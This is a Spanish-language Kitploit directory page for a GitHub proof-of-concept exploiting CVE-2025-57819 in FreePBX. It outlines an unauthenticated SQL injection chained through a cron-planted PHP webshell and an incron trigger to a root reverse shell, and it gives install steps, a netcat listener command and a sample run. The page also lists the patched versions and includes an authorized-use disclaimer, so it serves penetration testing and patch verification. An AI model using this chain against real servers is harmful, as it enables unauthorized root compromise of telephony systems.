Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57819-FreePBX-RCE2Root — PoC de cadena completa del CVE-2025-57819 para FreePBX 15, 16 y 17: SQLi no autenticado a RCE y toma de control de root. | Kitploit
Herramientas/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
ozcanpng/cve-2025-57819-freepbx-rce2root

CVE-2025-57819-FreePBX-RCE2Root

PoC de cadena completa del CVE-2025-57819 para FreePBX 15, 16 y 17: SQLi no autenticado a RCE y toma de control de root.

Ver Repositorio
114hace 3 mesesAún no revisado

CVE-2025-57819 — FreePBX SQLi → RCE → Root

PoC de cadena completa para CVE-2025-57819. La inyección SQL basada en errores no autenticada en el módulo endpoint de FreePBX encadena hasta una shell root mediante la inyección de trabajos cron y la escalada de privilegios por incron.

Solo para pruebas autorizadas e investigación. No lo uses contra sistemas que no sean tuyos.


Qué hace

SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
  1. Extrae información de la BD mediante inyección basada en errores en /admin/ajax.php
  2. Inyecta un trabajo cron que escribe una webshell PHP en la raíz web
  3. Espera a que se ejecute cron (~60s) y confirma RCE como asterisk
  4. Crea un archivo de disparo incron que ejecuta el hook de fwconsole como root
  5. Captura la reverse shell en tu listener

Instalación

git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

Uso

python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]

Inicia un listener primero:

nc -lvnp 9999

Luego ejecuta:

python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

--cleanup elimina la webshell y el trabajo cron después de la explotación.


Afectados

FreePBX con el módulo endpoint instalado. El parámetro brand en /admin/ajax.php se pasa sin sanitizar a una consulta SQL.

FreePBXPatched Version
15.x15.0.66
16.x16.0.89
17.x17.0.3

Referencias

  • Aviso de seguridad de FreePBX GHSA-m42g-xg4c-5f3h
  • NVD — CVE-2025-57819

Autor

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Descargar herramienta